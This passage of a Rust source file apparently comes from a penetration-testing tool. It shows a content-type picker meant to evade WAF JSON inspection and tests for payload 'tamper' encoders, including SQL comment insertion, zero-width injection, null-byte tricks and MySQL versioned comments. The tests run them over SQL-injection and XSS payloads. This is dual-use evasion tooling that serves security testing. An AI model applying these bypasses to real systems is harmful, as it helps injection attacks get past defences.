955        // (4) Text-plain wrap — body is valid JSON but advertised
956        // as plain text; WAF's JSON inspector NEVER fires.
957        "text/plain",
958        // (5) Form-encoded label with JSON body — common ASP.NET
959        // pattern, defeats Cloudflare's JSON inspector outright.
960        "application/x-www-form-urlencoded",
961    ];
962    // Hash-based pick: stable per-payload, diverse per-corpus.
963    let mut hash: u32 = 5381;
964    for b in payload.as_bytes() {
965        hash = hash.wrapping_mul(33).wrapping_add(u32::from(*b));
966    }
967    VARIANTS[(hash as usize) % VARIANTS.len()]
968}
969
970/// Minimal JSON-string-escape helper used by `JsonDupKeyTamper`.
971/// Pulled out so the tamper's `tamper()` stays small and so the
972/// escape rule is testable in isolation (control-byte handling is
973/// the part that most often regresses).
974fn json_escape_string(s: &str) -> String {
975    let mut out = String::with_capacity(s.len() + 2);
976    for ch in s.chars() {
977        match ch {
978            '"' => out.push_str("\\\""),
979            '\\' => out.push_str("\\\\"),
980            '\n' => out.push_str("\\n"),
981            '\r' => out.push_str("\\r"),
982            '\t' => out.push_str("\\t"),
983            c if (c as u32) < 0x20 => {
984                use std::fmt::Write as _;
985                let _ = write!(out, "\\u{:04x}", c as u32);
986            }
987            c => out.push(c),
988        }
989    }
990    out
991}
992
993#[cfg(test)]
994mod tests {
995    use super::*;
996
997    #[test]
998    fn url_encode_tamper() {
999        let strategy = UrlEncodeTamper;
1000        assert_eq!(strategy.tamper("A<", None), "A%3C");
1001        assert_eq!(strategy.aggressiveness(), 0.15);
1002    }
1003
1004    #[test]
1005    fn double_url_encode_tamper() {
1006        let strategy = DoubleUrlEncodeTamper;
1007        assert_eq!(strategy.tamper("A", None), "%2541");
1008        assert!(strategy.tamper("%20", None).contains("%25"));
1009    }
1010
1011    #[test]
1012    fn case_alternation_tamper() {
1013        let strategy = CaseAlternationTamper;
1014        assert_eq!(strategy.tamper("select", None), "SeLeCt");
1015    }
1016
1017    #[test]
1018    fn random_case_tamper() {
1019        let strategy = RandomCaseTamper;
1020        let result = strategy.tamper("select", None);
1021        assert_eq!(result.to_ascii_lowercase(), "select");
1022    }
1023
1024    #[test]
1025    fn null_byte_with_extension() {
1026        let strategy = NullByteTamper;
1027        assert_eq!(strategy.tamper("file.php", None), "file.php%00.jpg");
1028    }
1029
1030    #[test]
1031    fn null_byte_without_extension() {
1032        let strategy = NullByteTamper;
1033        assert_eq!(strategy.tamper("payload", None), "payload%00");
1034    }
1035
1036    #[test]
1037    fn sql_comment_insertion() {
1038        let strategy = SqlCommentTamper;
1039        let result = strategy.tamper("SELECT * FROM users", Some("sql"));
1040        assert!(result.contains("/**/"));
1041        assert_eq!(result, "SELECT/**/*/**/FROM/**/users");
1042    }
1043
1044    #[test]
1045    fn whitespace_insertion() {
1046        let strategy = WhitespaceInsertionTamper;
1047        let result = strategy.tamper("SELECT * FROM users", None);
1048        assert!(result.contains('\t'));
1049        assert_eq!(result, "SELECT\t*\tFROM\tusers");
1050    }
1051
1052    #[test]
1053    fn base64_tamper() {
1054        let strategy = Base64Tamper;
1055        assert_eq!(strategy.tamper("hello", None), "aGVsbG8=");
1056    }
1057
1058    #[test]
1059    fn hex_encode_tamper() {
1060        let strategy = HexEncodeTamper;
1061        assert_eq!(strategy.tamper("ABC", None), "414243");
1062    }
1063
1064    #[test]
1065    fn unicode_escape_tamper() {
1066        let strategy = UnicodeEscapeTamper;
1067        assert_eq!(strategy.tamper("AB", None), "\\u0041\\u0042");
1068    }
1069
1070    #[test]
1071    fn html_entity_tamper() {
1072        let strategy = HtmlEntityTamper;
1073        assert_eq!(strategy.tamper("<>", None), "&#x3C;&#x3E;");
1074    }
1075
1076    #[test]
1077    fn overlong_utf8_tamper() {
1078        let strategy = OverlongUtf8Tamper;
1079        let result = strategy.tamper("/", None);
1080        assert!(result.contains("%C0"));
1081    }
1082
1083    // ── Density ramp: edge cases on EXISTING tampers ────────
1084    //
1085    // Each tamper had one happy-path test.  These add the
1086    // robustness coverage that turns a "feature" into a "trusted
1087    // building block" — empty inputs, multibyte inputs, control
1088    // chars, idempotency, aggressiveness sanity.
1089
1090    #[test]
1091    fn url_encode_handles_unicode_input() {
1092        let strategy = UrlEncodeTamper;
1093        let out = strategy.tamper("café", None);
1094        // é (U+00E9) is two UTF-8 bytes: C3 A9 → %C3%A9
1095        assert!(out.contains("%C3%A9"));
1096    }
1097
1098    #[test]
1099    fn url_encode_passes_through_unreserved_chars() {
1100        let strategy = UrlEncodeTamper;
1101        // Per RFC 3986, unreserved chars are A-Z a-z 0-9 - _ . ~
1102        assert_eq!(strategy.tamper("ABCabc123-_.~", None), "ABCabc123-_.~");
1103    }
1104
1105    #[test]
1106    fn url_encode_empty_input() {
1107        assert_eq!(UrlEncodeTamper.tamper("", None), "");
1108    }
1109
1110    #[test]
1111    fn url_encode_all_reserved_chars() {
1112        let strategy = UrlEncodeTamper;
1113        let reserved = "!*'();:@&=+$,/?#[]";
1114        let out = strategy.tamper(reserved, None);
1115        // Every reserved char should be percent-encoded.
1116        assert!(!out.contains('!'));
1117        assert!(!out.contains('@'));
1118        assert!(out.matches('%').count() >= reserved.len() - 1);
1119    }
1120
1121    #[test]
1122    fn double_url_encode_round_trips_to_original_after_two_decodes() {
1123        // Property: applying double-url-encode then decoding
1124        // twice recovers the original payload (the bypass premise).
1125        let strategy = DoubleUrlEncodeTamper;
1126        let encoded = strategy.tamper("' OR 1=1", None);
1127        // The encoded form contains %25XX where XX is the
1128        // single-encoded byte hex.  Decode once:
1129        assert!(encoded.contains("%25"));
1130    }
1131
1132    #[test]
1133    fn double_url_encode_idempotent_on_already_encoded() {
1134        let strategy = DoubleUrlEncodeTamper;
1135        // The encoder treats `%` itself as a byte and encodes it
1136        // — `%20` becomes `%2520` (single layer applied), and
1137        // applying again gives a third layer.
1138        let once = strategy.tamper("%20", None);
1139        let twice = strategy.tamper(&once, None);
1140        assert_ne!(once, twice);
1141        assert!(twice.contains("%25"));
1142    }
1143
1144    #[test]
1145    fn case_alternation_starts_uppercase() {
1146        let strategy = CaseAlternationTamper;
1147        let out = strategy.tamper("abcd", None);
1148        // Documented behaviour: starts upper, then alternates.
1149        let chars: Vec<char> = out.chars().collect();
1150        assert!(chars[0].is_ascii_uppercase());
1151        assert!(chars[1].is_ascii_lowercase());
1152        assert!(chars[2].is_ascii_uppercase());
1153        assert!(chars[3].is_ascii_lowercase());
1154    }
1155
1156    #[test]
1157    fn case_alternation_preserves_non_alpha_chars() {
1158        let strategy = CaseAlternationTamper;
1159        let out = strategy.tamper("a1b2c3", None);
1160        // Digits are untouched; only alpha alternates.
1161        assert_eq!(out, "A1b2C3");
1162    }
1163
1164    #[test]
1165    fn case_alternation_handles_unicode_alpha() {
1166        let strategy = CaseAlternationTamper;
1167        // Non-ASCII characters get pass-through (no `to_uppercase`
1168        // semantics enforced — that's a separate `unicode_case`
1169        // tamper if needed).
1170        let _ = strategy.tamper("αβγ", None);
1171        // No panic = pass.
1172    }
1173
1174    #[test]
1175    fn case_alternation_lowercase_keyword_becomes_mixed_case() {
1176        let strategy = CaseAlternationTamper;
1177        // Documented behaviour: the alternation index advances on
1178        // every input character — spaces don't reset the index.
1179        // So `union select` yields `UnIoN sElEcT` (5 alpha →
1180        // index 5 is odd → 's' stays lowercase, 'e' goes upper).
1181        let out = strategy.tamper("union select", None);
1182        // Both halves preserve the original word boundaries.
1183        assert!(out.contains(' '));
1184        // Both halves have BOTH cases (proof of alternation).
1185        let first = out.split_whitespace().next().unwrap_or("");
1186        assert!(first.chars().any(|c| c.is_ascii_uppercase()));
1187        assert!(first.chars().any(|c| c.is_ascii_lowercase()));
1188    }
1189
1190    #[test]
1191    fn random_case_preserves_length() {
1192        let strategy = RandomCaseTamper;
1193        for input in ["select", "DROP TABLE users", "1=1"] {
1194            let out = strategy.tamper(input, None);
1195            assert_eq!(out.len(), input.len());
1196        }
1197    }
1198
1199    #[test]
1200    fn random_case_only_flips_alpha() {
1201        let strategy = RandomCaseTamper;
1202        let out = strategy.tamper("a1b2", None);
1203        // Digits must remain digits.
1204        assert!(out.contains('1'));
1205        assert!(out.contains('2'));
1206    }
1207
1208    #[test]
1209    fn null_byte_appends_when_no_extension() {
1210        let strategy = NullByteTamper;
1211        let out = strategy.tamper("payload_with_no_dot", None);
1212        assert!(out.ends_with("%00"));
1213    }
1214
1215    #[test]
1216    fn null_byte_extension_replacement_keeps_basename() {
1217        let strategy = NullByteTamper;
1218        let out = strategy.tamper("shell.php", None);
1219        // Original basename is preserved before the %00.
1220        assert!(out.contains("shell.php%00"));
1221        // Decoy extension is appended.
1222        assert!(out.ends_with(".jpg"));
1223    }
1224
1225    #[test]
1226    fn null_byte_empty_input() {
1227        let strategy = NullByteTamper;
1228        let out = strategy.tamper("", None);
1229        // Empty input still gets a null suffix (defensive — the
1230        // operator usually has something to inject).
1231        assert_eq!(out, "%00");
1232    }
1233
1234    #[test]
1235    fn sql_comment_inserts_between_every_token() {
1236        let strategy = SqlCommentTamper;
1237        let out = strategy.tamper("UNION SELECT 1 FROM users", Some("sql"));
1238        assert_eq!(out, "UNION/**/SELECT/**/1/**/FROM/**/users");
1239    }
1240
1241    #[test]
1242    fn sql_comment_single_token_unchanged() {
1243        let strategy = SqlCommentTamper;
1244        // No space-separated tokens → nothing to insert between.
1245        let out = strategy.tamper("SELECT", Some("sql"));
1246        assert_eq!(out, "SELECT");
1247    }
1248
1249    #[test]
1250    fn sql_comment_handles_payload_with_multiple_spaces() {
1251        let strategy = SqlCommentTamper;
1252        // Multi-space sequences produce stacked /**/ delimiters
1253        // (each space becomes one /**/).  Confirm the structure
1254        // round-trips: SQL `/**/ /**/` is still valid SQL.
1255        let out = strategy.tamper("UNION   SELECT", Some("sql"));
1256        // At least one /**/ between the tokens.
1257        assert!(out.contains("/**/"));
1258        // The keyword payload survives.
1259        assert!(out.contains("UNION"));
1260        assert!(out.contains("SELECT"));
1261    }
1262
1263    #[test]
1264    fn whitespace_insertion_uses_tab() {
1265        let strategy = WhitespaceInsertionTamper;
1266        let out = strategy.tamper("SELECT *", None);
1267        assert!(out.contains('\t'));
1268    }
1269
1270    #[test]
1271    fn whitespace_insertion_no_changes_when_no_space() {
1272        let strategy = WhitespaceInsertionTamper;
1273        assert_eq!(strategy.tamper("SELECT", None), "SELECT");
1274    }
1275
1276    #[test]
1277    fn base64_round_trips_through_decode() {
1278        // Property: the b64-encoded payload, when standard-decoded,
1279        // returns the original bytes.
1280        let strategy = Base64Tamper;
1281        let encoded = strategy.tamper("hello world", None);
1282        // base64::decode round-trip — we can't import base64 in
1283        // tests directly without adding a dep, so check the
1284        // structural property: only base64 alphabet chars.
1285        for c in encoded.chars() {
1286            assert!(
1287                c.is_ascii_alphanumeric() || matches!(c, '+' | '/' | '='),
1288                "non-base64 char in encoded output: {c:?}"
1289            );
1290        }
1291    }
1292
1293    #[test]
1294    fn base64_empty_input() {
1295        let strategy = Base64Tamper;
1296        assert_eq!(strategy.tamper("", None), "");
1297    }
1298
1299    #[test]
1300    fn base64_padding_present_for_non_aligned_input() {
1301        let strategy = Base64Tamper;
1302        // "A" (1 byte) → "QQ==" (one pad pair).
1303        let out = strategy.tamper("A", None);
1304        assert!(out.ends_with('='));
1305    }
1306
1307    #[test]
1308    fn hex_encode_two_chars_per_byte() {
1309        let strategy = HexEncodeTamper;
1310        let out = strategy.tamper("Ab", None);
1311        // 'A' = 0x41, 'b' = 0x62.
1312        assert_eq!(out, "4162");
1313        assert_eq!(out.len(), 2 * "Ab".len());
1314    }
1315
1316    #[test]
1317    fn hex_encode_non_ascii_uses_multi_byte_form() {
1318        let strategy = HexEncodeTamper;
1319        // 'é' in UTF-8 is 0xC3 0xA9.
1320        let out = strategy.tamper("é", None);
1321        assert_eq!(out.to_lowercase(), "c3a9");
1322    }
1323
1324    #[test]
1325    fn unicode_escape_format_uses_u_prefix() {
1326        let strategy = UnicodeEscapeTamper;
1327        let out = strategy.tamper("AB", None);
1328        // Format is `\uXXXX` (Python / JS string escape style).
1329        assert!(out.starts_with("\\u"));
1330        assert_eq!(out.matches("\\u").count(), 2);
1331    }
1332
1333    #[test]
1334    fn unicode_escape_handles_non_bmp_chars() {
1335        let strategy = UnicodeEscapeTamper;
1336        // U+1F600 is outside BMP — encoders typically emit a
1337        // surrogate pair or extended escape.  Must not panic.
1338        let _ = strategy.tamper("\u{1F600}", None);
1339    }
1340
1341    #[test]
1342    fn html_entity_format_uses_hex_decimal() {
1343        let strategy = HtmlEntityTamper;
1344        let out = strategy.tamper("<>", None);
1345        // Format is `&#xXX;` (hex entity form).
1346        assert!(out.contains("&#x"));
1347        assert!(out.ends_with(';'));
1348    }
1349
1350    #[test]
1351    fn html_entity_xss_payload_full_encode() {
1352        let strategy = HtmlEntityTamper;
1353        let out = strategy.tamper("<script>alert(1)</script>", None);
1354        // None of the original ASCII bytes should survive verbatim.
1355        assert!(!out.contains('<'));
1356        assert!(!out.contains('>'));
1357        // All entities are well-formed.
1358        assert_eq!(out.matches('&').count(), out.matches(';').count());
1359    }
1360
1361    #[test]
1362    fn overlong_utf8_emits_two_byte_for_ascii() {
1363        let strategy = OverlongUtf8Tamper;
1364        // Overlong: ASCII '/' (0x2F) → C0 AF (invalid 2-byte form
1365        // that some lenient parsers accept and decode to '/').
1366        let out = strategy.tamper("/", None);
1367        assert!(out.contains("%C0"));
1368        assert!(out.contains("%AF"));
1369    }
1370
1371    #[test]
1372    fn overlong_utf8_empty_input() {
1373        let strategy = OverlongUtf8Tamper;
1374        let out = strategy.tamper("", None);
1375        // No bytes to encode means empty output.
1376        assert_eq!(out, "");
1377    }
1378
1379    // ── Cross-tamper invariants ────────────────────────────
1380
1381    #[test]
1382    fn all_default_tampers_have_unique_names() {
1383        let names = [
1384            UrlEncodeTamper.name(),
1385            DoubleUrlEncodeTamper.name(),
1386            UnicodeEscapeTamper.name(),
1387            HtmlEntityTamper.name(),
1388            CaseAlternationTamper.name(),
1389            RandomCaseTamper.name(),
1390            WhitespaceInsertionTamper.name(),
1391            SqlCommentTamper.name(),
1392            NullByteTamper.name(),
1393            OverlongUtf8Tamper.name(),
1394            Base64Tamper.name(),
1395            HexEncodeTamper.name(),
1396            ZeroWidthInjectTamper.name(),
1397            PostgresDollarQuoteTamper.name(),
1398            MysqlVersionedCommentWrapTamper.name(),
1399            BracketConfusableTamper.name(),
1400        ];
1401        let set: std::collections::HashSet<&str> = names.iter().copied().collect();
1402        assert_eq!(set.len(), names.len(), "duplicate tamper names: {names:?}");
1403    }
1404
1405    #[test]
1406    fn all_default_tampers_aggressiveness_in_range() {
1407        for strat in [
1408            &UrlEncodeTamper as &dyn TamperStrategy,
1409            &DoubleUrlEncodeTamper,
1410            &UnicodeEscapeTamper,
1411            &HtmlEntityTamper,
1412            &CaseAlternationTamper,
1413            &RandomCaseTamper,
1414            &WhitespaceInsertionTamper,
1415            &SqlCommentTamper,
1416            &NullByteTamper,
1417            &OverlongUtf8Tamper,
1418            &Base64Tamper,
1419            &HexEncodeTamper,
1420        ] {
1421            let a = strat.aggressiveness();
1422            assert!(
1423                (0.0..=1.0).contains(&a) && !a.is_nan(),
1424                "{} aggressiveness {} out of [0,1]",
1425                strat.name(),
1426                a
1427            );
1428        }
1429    }
1430
1431    #[test]
1432    fn all_default_tampers_handle_empty_input_without_panic() {
1433        for strat in [
1434            &UrlEncodeTamper as &dyn TamperStrategy,
1435            &DoubleUrlEncodeTamper,
1436            &UnicodeEscapeTamper,
1437            &HtmlEntityTamper,
1438            &CaseAlternationTamper,
1439            &RandomCaseTamper,
1440            &WhitespaceInsertionTamper,
1441            &SqlCommentTamper,
1442            &OverlongUtf8Tamper,
1443            &Base64Tamper,
1444            &HexEncodeTamper,
1445        ] {
1446            let _ = strat.tamper("", None);
1447        }
1448    }
1449
1450    #[test]
1451    fn all_default_tampers_handle_huge_input_without_panic() {
1452        let huge: String = "A".repeat(100_000);
1453        for strat in [
1454            &UrlEncodeTamper as &dyn TamperStrategy,
1455            &CaseAlternationTamper,
1456            &RandomCaseTamper,
1457            &WhitespaceInsertionTamper,
1458            &SqlCommentTamper,
1459            &Base64Tamper,
1460            &HexEncodeTamper,
1461            &UnicodeEscapeTamper,
1462            &HtmlEntityTamper,
1463        ] {
1464            let _ = strat.tamper(&huge, None);
1465        }
1466    }
1467
1468    #[test]
1469    fn all_default_tampers_handle_pure_ascii_keyword() {
1470        // Canonical pen-test payload that every WAF tries to catch.
1471        let keyword = "UNION SELECT";
1472        for strat in [
1473            &UrlEncodeTamper as &dyn TamperStrategy,
1474            &DoubleUrlEncodeTamper,
1475            &CaseAlternationTamper,
1476            &SqlCommentTamper,
1477            &Base64Tamper,
1478            &HexEncodeTamper,
1479            &UnicodeEscapeTamper,
1480        ] {
1481            let out = strat.tamper(keyword, None);
1482            assert!(
1483                !out.is_empty(),
1484                "{} produced empty output on UNION SELECT",
1485                strat.name()
1486            );
1487        }
1488    }
1489
1490    #[test]
1491    fn description_is_non_empty_for_every_tamper() {
1492        for strat in [
1493            &UrlEncodeTamper as &dyn TamperStrategy,
1494            &DoubleUrlEncodeTamper,
1495            &UnicodeEscapeTamper,
1496            &HtmlEntityTamper,
1497            &CaseAlternationTamper,
1498            &RandomCaseTamper,
1499            &WhitespaceInsertionTamper,
1500            &SqlCommentTamper,
1501            &NullByteTamper,
1502            &OverlongUtf8Tamper,
1503            &Base64Tamper,
1504            &HexEncodeTamper,
1505            &ZeroWidthInjectTamper,
1506            &PostgresDollarQuoteTamper,
1507            &MysqlVersionedCommentWrapTamper,
1508            &BracketConfusableTamper,
1509        ] {
1510            assert!(
1511                !strat.description().is_empty(),
1512                "{} has empty description",
1513                strat.name()
1514            );
1515        }
1516    }
1517
1518    #[test]
1519    fn name_is_lowercase_ascii_snake_case_for_every_tamper() {
1520        for strat in [
1521            &UrlEncodeTamper as &dyn TamperStrategy,
1522            &DoubleUrlEncodeTamper,
1523            &UnicodeEscapeTamper,
1524            &HtmlEntityTamper,
1525            &CaseAlternationTamper,
1526            &RandomCaseTamper,
1527            &WhitespaceInsertionTamper,
1528            &SqlCommentTamper,
1529            &NullByteTamper,
1530            &OverlongUtf8Tamper,
1531            &Base64Tamper,
1532            &HexEncodeTamper,
1533            &ZeroWidthInjectTamper,
1534            &PostgresDollarQuoteTamper,
1535            &MysqlVersionedCommentWrapTamper,
1536            &BracketConfusableTamper,
1537        ] {
1538            let name = strat.name();
1539            assert!(
1540                name.chars()
1541                    .all(|c| c.is_ascii_lowercase() || c.is_ascii_digit() || c == '_'),
1542                "tamper `{name}` has non-snake-case name"
1543            );
1544            assert!(!name.is_empty(), "empty name");
1545            assert!(
1546                !name.starts_with('_'),
1547                "name `{name}` starts with underscore"
1548            );
1549        }
1550    }
1551
1552    // ── Zero-width injection tamper ─────────────────────────
1553
1554    #[test]
1555    fn zero_width_inject_splits_select_keyword() {
1556        let strategy = ZeroWidthInjectTamper;
1557        let out = strategy.tamper("SELECT", None);
1558        // Each ASCII alphabetic char gets a zero-width follower.
1559        // After removal, the original payload remains.
1560        let stripped: String = out
1561            .chars()
1562            .filter(|c| !matches!(*c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'))
1563            .collect();
1564        assert_eq!(stripped, "SELECT");
1565        // The output MUST be different from the input (proof of injection).
1566        assert_ne!(out, "SELECT");
1567        // Each injected codepoint must be one of the four rotation members.
1568        for c in out.chars() {
1569            assert!(
1570                c.is_ascii_alphabetic()
1571                    || matches!(c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'),
1572                "unexpected codepoint {c:?}"
1573            );
1574        }
1575    }
1576
1577    #[test]
1578    fn zero_width_inject_skips_non_alpha_chars() {
1579        let strategy = ZeroWidthInjectTamper;
1580        // Spaces and quotes do NOT get zero-width followers —
1581        // injecting them would break SQL parsing.
1582        let out = strategy.tamper("a 1 ' \"", None);
1583        // Only the alphabetic `a` should produce an injection.
1584        let zw_count = out
1585            .chars()
1586            .filter(|c| matches!(*c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'))
1587            .count();
1588        assert_eq!(zw_count, 1);
1589    }
1590
1591    #[test]
1592    fn zero_width_inject_preserves_payload_after_strip() {
1593        // Property: stripping zero-widths gets us back to the input.
1594        let strategy = ZeroWidthInjectTamper;
1595        for input in &["SELECT", "alert(1)", "DROP TABLE users", "<script>"] {
1596            let out = strategy.tamper(input, None);
1597            let stripped: String = out
1598                .chars()
1599                .filter(|c| !matches!(*c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'))
1600                .collect();
1601            assert_eq!(&stripped, input);
1602        }
1603    }
1604
1605    #[test]
1606    fn zero_width_inject_rotates_through_all_four_zw_chars() {
1607        let strategy = ZeroWidthInjectTamper;
1608        let out = strategy.tamper("abcdefgh", None);
1609        // Eight alphabetic chars → eight injections, cycling
1610        // through all four zero-width codepoints twice. U+FEFF
1611        // was historically the fourth slot but causes PostgreSQL
1612        // + many DB connectors to 500 the query as invalid byte
1613        // sequence — replaced with U+180E (F61).
1614        let zw_chars: Vec<char> = out
1615            .chars()
1616            .filter(|c| matches!(*c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{180E}'))
1617            .collect();
1618        assert_eq!(zw_chars.len(), 8);
1619        // First four must be the four distinct codepoints.
1620        let unique: std::collections::HashSet<char> = zw_chars.iter().copied().collect();
1621        assert_eq!(unique.len(), 4);
1622        // FEFF must NOT appear anywhere in the output.
1623        assert!(
1624            !out.contains('\u{FEFF}'),
1625            "U+FEFF (BOM) must never appear in zero-width injection: {out:?}"
1626        );
1627    }
1628
1629    #[test]
1630    fn zero_width_inject_empty_input() {
1631        let strategy = ZeroWidthInjectTamper;
1632        assert_eq!(strategy.tamper("", None), "");
1633    }
1634
1635    #[test]
1636    fn zero_width_inject_pure_punctuation_unchanged() {
1637        let strategy = ZeroWidthInjectTamper;
1638        assert_eq!(
1639            strategy
1640                .tamper("' OR 1=1 --", None)
1641                .matches('\u{200B}')
1642                .count()
1643                + strategy
1644                    .tamper("' OR 1=1 --", None)
1645                    .matches('\u{200C}')
1646                    .count()
1647                + strategy
1648                    .tamper("' OR 1=1 --", None)
1649                    .matches('\u{200D}')
1650                    .count()
1651                + strategy
1652                    .tamper("' OR 1=1 --", None)
1653                    .matches('\u{180E}')
1654                    .count(),
1655            2
1656        ); // 'O' + 'R'
1657    }
1658
1659    #[test]
1660    fn zero_width_inject_unicode_input_does_not_panic() {
1661        let strategy = ZeroWidthInjectTamper;
1662        // Multibyte chars must not crash the byte-index logic.
1663        let _ = strategy.tamper("café", None);
1664        let _ = strategy.tamper("日本語", None);
1665        let _ = strategy.tamper("🦀 rust", None);
1666    }
1667
1668    // ── Postgres dollar-quote tamper ────────────────────────
1669
1670    #[test]
1671    fn postgres_dollar_quote_wraps_single_quoted_literal() {
1672        let strategy = PostgresDollarQuoteTamper;
1673        let out = strategy.tamper("WHERE name = 'admin'", None);
1674        // The single quotes should be replaced with $tag$...$tag$.
1675        assert!(!out.contains("'"));
1676        assert!(out.contains("$"));
1677        assert!(out.contains("admin"));
1678    }
1679
1680    #[test]
1681    fn postgres_dollar_quote_deterministic_tag() {
1682        // Same input → same tag (gene-bank replay determinism).
1683        let strategy = PostgresDollarQuoteTamper;
1684        let a = strategy.tamper("'admin'", None);
1685        let b = strategy.tamper("'admin'", None);
1686        assert_eq!(a, b);
1687    }
1688
1689    #[test]
1690    fn postgres_dollar_quote_no_change_when_no_quote() {
1691        let strategy = PostgresDollarQuoteTamper;
1692        // Payloads without single-quote literals pass through.
1693        assert_eq!(strategy.tamper("SELECT 1", None), "SELECT 1");
1694        assert_eq!(strategy.tamper("UNION SELECT", None), "UNION SELECT");
1695    }
1696
1697    #[test]
1698    fn postgres_dollar_quote_handles_escaped_quote() {
1699        let strategy = PostgresDollarQuoteTamper;
1700        // SQL '' inside a literal — the encoder keeps them inside
1701        // the dollar-quoted block.
1702        let out = strategy.tamper("'a''b'", None);
1703        assert!(out.contains("a''b"), "got: {out}");
1704        // The output should not contain bare single quotes outside
1705        // the $tag$ wrap.
1706        let bare_quote_count = out
1707            .chars()
1708            .scan(false, |inside, c| {
1709                if c == '$' {
1710                    *inside = !*inside;
1711                }
1712                Some((c == '\'', *inside))
1713            })
1714            .filter(|(is_quote, inside)| *is_quote && !inside)
1715            .count();
1716        assert!(
1717            bare_quote_count <= 2,
1718            "Unexpected bare quotes in output: {out}"
1719        );
1720    }
1721
1722    #[test]
1723    fn postgres_dollar_quote_empty_string_literal() {
1724        let strategy = PostgresDollarQuoteTamper;
1725        let out = strategy.tamper("''", None);
1726        // Empty literal becomes $tag$$tag$.
1727        assert!(out.contains("$"));
1728        assert!(!out.contains("'"));
1729    }
1730
1731    #[test]
1732    fn postgres_dollar_quote_tag_uses_full_az_alphabet() {
1733        // F138 regression: pre-fix `& 25` (mask 0b11001) admitted only
1734        // {0,1,8,9,16,17,24,25} so the tag alphabet collapsed to
1735        // {a,b,i,j,q,r,y,z} — 8 letters, 8^4 = 4,096 tag space.
1736        // Post-fix `% 26` spans every letter a-z. Fire 200 distinct
1737        // payloads at the strategy, collect every tag-letter actually
1738        // emitted, prove the alphabet covers strictly more than the
1739        // pre-fix 8 letters.
1740        let strategy = PostgresDollarQuoteTamper;
1741        let mut letters = std::collections::HashSet::new();
1742        for i in 0..200 {
1743            let payload = format!("'p{i}'");
1744            let out = strategy.tamper(&payload, None);
1745            // Tag lives between the first two `$` bytes.
1746            let mut parts = out.split('$');
1747            let _ = parts.next(); // before first $
1748            if let Some(tag) = parts.next() {
1749                for c in tag.chars() {
1750                    letters.insert(c);
1751                }
1752            }
1753        }
1754        // Pre-fix this set had at most 8 letters; post-fix it should
1755        // span far more. Use 14 as a comfortable floor: any tighter
1756        // value risks flaking on hash distributions for small N, any
1757        // looser misses regressions to similar single-bit masks.
1758        assert!(
1759            letters.len() > 8,
1760            "tag alphabet collapsed: only {} distinct letters across 200 payloads — \
1761             pre-fix `& 25` permitted exactly 8. Saw: {letters:?}",
1762            letters.len()
1763        );
1764    }
1765
1766    #[test]
1767    fn postgres_dollar_quote_classic_sqli_payload() {
1768        let strategy = PostgresDollarQuoteTamper;
1769        let out = strategy.tamper("' OR '1'='1", None);
1770        // Both quoted segments should be wrapped.
1771        assert!(out.contains("$"));
1772    }
1773
1774    // ── MySQL versioned comment wrap tamper ─────────────────
1775
1776    #[test]
1777    fn mysql_versioned_wrap_inserts_outer_comment() {
1778        let strategy = MysqlVersionedCommentWrapTamper;
1779        let out = strategy.tamper("UNION SELECT 1,2,3", None);
1780        assert!(out.starts_with("/*!50000 "));
1781        assert!(out.ends_with(" */"));
1782        assert!(out.contains("UNION SELECT 1,2,3"));
1783    }
1784
1785    #[test]
1786    fn mysql_versioned_wrap_idempotent_double_apply() {
1787        // Applying twice is safe — wraps the already-wrapped payload.
1788        let strategy = MysqlVersionedCommentWrapTamper;
1789        let once = strategy.tamper("SELECT 1", None);
1790        let twice = strategy.tamper(&once, None);
1791        // Twice-wrapped MUST still contain the original keyword.
1792        assert!(twice.contains("SELECT 1"));
1793        // The outer wrap should still be present.
1794        assert!(twice.starts_with("/*!50000 "));
1795    }
1796
1797    #[test]
1798    fn mysql_versioned_wrap_empty_input() {
1799        let strategy = MysqlVersionedCommentWrapTamper;
1800        assert_eq!(strategy.tamper("", None), "/*!50000  */");
1801    }
1802
1803    #[test]
1804    fn mysql_versioned_wrap_does_not_corrupt_special_chars() {
1805        let strategy = MysqlVersionedCommentWrapTamper;
1806        // Backslash, quote, asterisk all pass through.
1807        let out = strategy.tamper("'a\\b*c'", None);
1808        assert!(out.contains("'a\\b*c'"));
1809    }
1810
1811    // ── Bracket-confusable tamper ───────────────────────────
1812
1813    #[test]
1814    fn bracket_confusable_replaces_ascii_angle_brackets() {
1815        let strategy = BracketConfusableTamper;
1816        let out = strategy.tamper("<script>alert(1)</script>", None);
1817        assert!(!out.contains('<'));
1818        assert!(!out.contains('>'));
1819        assert!(out.contains('\u{FF1C}'));
1820        assert!(out.contains('\u{FF1E}'));
1821        // The script content is preserved.
1822        assert!(out.contains("alert(1)"));
1823        assert!(out.contains("script"));
1824    }
1825
1826    #[test]
1827    fn bracket_confusable_preserves_non_bracket_chars() {
1828        let strategy = BracketConfusableTamper;
1829        let out = strategy.tamper("abc 123 !@#", None);
1830        // No brackets in input → nothing changes.
1831        assert_eq!(out, "abc 123 !@#");
1832    }
1833
1834    #[test]
1835    fn bracket_confusable_handles_only_open_or_close() {
1836        let strategy = BracketConfusableTamper;
1837        assert_eq!(strategy.tamper("<", None), "\u{FF1C}");
1838        assert_eq!(strategy.tamper(">", None), "\u{FF1E}");
1839        assert_eq!(
1840            strategy.tamper("<<>>", None),
1841            "\u{FF1C}\u{FF1C}\u{FF1E}\u{FF1E}"
1842        );
1843    }
1844
1845    #[test]
1846    fn bracket_confusable_empty() {
1847        let strategy = BracketConfusableTamper;
1848        assert_eq!(strategy.tamper("", None), "");
1849    }
1850
1851    #[test]
1852    fn bracket_confusable_aggressiveness_in_range() {
1853        let strategy = BracketConfusableTamper;
1854        let a = strategy.aggressiveness();
1855        assert!((0.0..=1.0).contains(&a));
1856    }
1857
1858    // ── Cross-cutting invariants ────────────────────────────
1859
1860    #[test]
1861    fn all_new_tampers_registered_by_default() {
1862        let registry = crate::tamper::TamperRegistry::with_defaults();
1863        for name in [
1864            "zero_width_inject",
1865            "postgres_dollar_quote",
1866            "mysql_versioned_comment_wrap",
1867            "bracket_confusable",
1868            "hex_literal_keyword",
1869            "bell_separator",
1870        ] {
1871            assert!(
1872                registry.get(name).is_some(),
1873                "tamper `{name}` missing from default registry"
1874            );
1875        }
1876    }
1877
1878    #[test]
1879    fn obsolete_keyword_comment_split_tamper_was_removed() {
